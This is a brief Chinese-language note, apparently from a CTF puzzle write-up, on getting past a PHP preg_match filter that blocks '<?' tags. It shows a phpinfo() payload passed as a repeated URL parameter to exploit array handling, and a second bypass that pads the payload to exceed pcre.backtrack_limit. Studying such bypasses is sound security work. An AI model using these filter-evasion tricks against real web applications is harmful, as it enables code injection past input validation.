http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/
待绕过目标如下
<?php
echo preg_match('/<\?.*[(`;?>].*/is', $_GET['a']);
最常见的绕过 数组
http://localhost/?a=<?php phpinfo();?>&a=123123
非常见的绕过 深悉正则(pcre)最大回溯/递归限制
<?php phpinfo();?>//AAAAAAA······ 此处省略数万个
Tips: pcre.backtrack_limit(回溯限制),当正则匹配的回溯次数达到这个值时就不会再匹配了,所以就没有匹配到最前面的eval
我看了下我的PHP配置,默认关闭 0.0